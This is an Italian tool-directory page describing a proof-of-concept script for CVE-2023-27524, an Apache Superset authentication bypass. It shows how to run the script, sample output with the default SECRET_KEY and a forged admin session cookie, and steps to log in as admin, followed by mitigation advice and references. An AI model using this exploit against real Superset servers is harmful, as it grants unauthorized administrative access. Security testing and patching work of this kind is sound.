Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-27524-POC — Una POC per la nuovissima CVE-2023-27524 che consente il bypass dell'autenticazione e l'accesso alla dashboard di amministrazione. | Kitploit
Strumenti/GitHubGitHub/maanvader/cve-2023-27524-poc
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubmaanvader/cve-2023-27524-poc

CVE-2023-27524-POC

Una POC per la nuovissima CVE-2023-27524 che consente il bypass dell'autenticazione e l'accesso alla dashboard di amministrazione.

Vedi Repository
3 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-27524: Apache Superset Bypass dell'autenticazione

Script per verificare se un server Apache Superset è vulnerabile a (CVE-2023-27524) e, se è vulnerabile, forgiare un cookie di sessione con user_id = 1, che di solito è l'utente admin, consentendo il bypass dell'autenticazione e l'accesso alla dashboard. Attualmente, ci sono circa 3000 server in tutto il mondo che eseguono Apache Superset.

Utilizzo

root@kitploit:~
usage: python3 CVE-2023-27524.py  --url URL 

Esempio base

root@kitploit:~
% python3 CVE-2023-27524.py --url http://10.1.221.202:8080   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard

Mitigazioni

Segui le istruzioni qui per generare e configurare una SECRET_KEY Flask. Lo strumento CLI superset può essere utilizzato per ruotare la SECRET_KEY in modo che le informazioni di connessione al database esistenti vengano preservate.

Dichiarazione di non responsabilità

Questa POC è creata solo a scopo educativo

Riferimenti

  • https://github.com/horizon3ai/CVE-2023-27524
  • https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
Scarica lo strumento